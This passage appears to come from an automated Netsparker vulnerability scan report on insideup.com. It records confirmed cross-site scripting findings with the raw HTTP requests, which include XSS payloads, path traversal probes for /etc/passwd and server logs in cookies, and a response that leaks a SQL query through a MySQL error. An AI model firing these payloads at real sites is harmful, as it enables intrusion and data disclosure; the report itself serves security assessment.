firstName POST Smith
lastName POST Smith
password1 POST '"--></style></script><script>alert(0x00050D)</script>
password2 POST 3
pseudonym POST 3
receiveSpecialOfferEmail POST netsparker@example.com
refererUrl POST http://www.insideup.com/index.html
termsOfService POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Content-Length: 327
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

companyName=Smith&emailAddress=netsparker%40example.com&firstName=Smith&lastName=Smith&password1='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00050D)%3c%2fscript%3e&password2=3&pseudonym=3&receiveSpecialOfferEmail=netsparker%40example.com&refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&termsOfService=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:22 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=F629F5EE3569B8BB2A496694BB1E1642; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> 
<option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." 
>Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" 
src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { 
document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" 
action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailAddress" value="netsparker@example.com" id="emailAddress" style="width..
- /ppc/leadflow/wede00/project.php

/ppc/leadflow/wede00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='%22--%3E%3C/..

Parameters

Parameter Type Value
catId GET 20001
iusrc GET iupsc
nsextt GET '"--></style></script><script>alert(0x000547)</script>

Request

GET /ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000547)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:39 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=g7vscnkspqm6768cii4hjuotj1; path=/
Content-Length: 3383
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000547)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000547)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000547)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000547)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000547)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000547)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join 
sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000547)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000547)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000547)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000547)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000547)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/phsy00/

/ppc/leadflow/phsy00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/phsy00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
nsextt GET '"--></style></script><script>alert(0x00054C)</script>

Request

GET /ppc/leadflow/phsy00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00054C)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/phsy00/project.php?catId=110009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
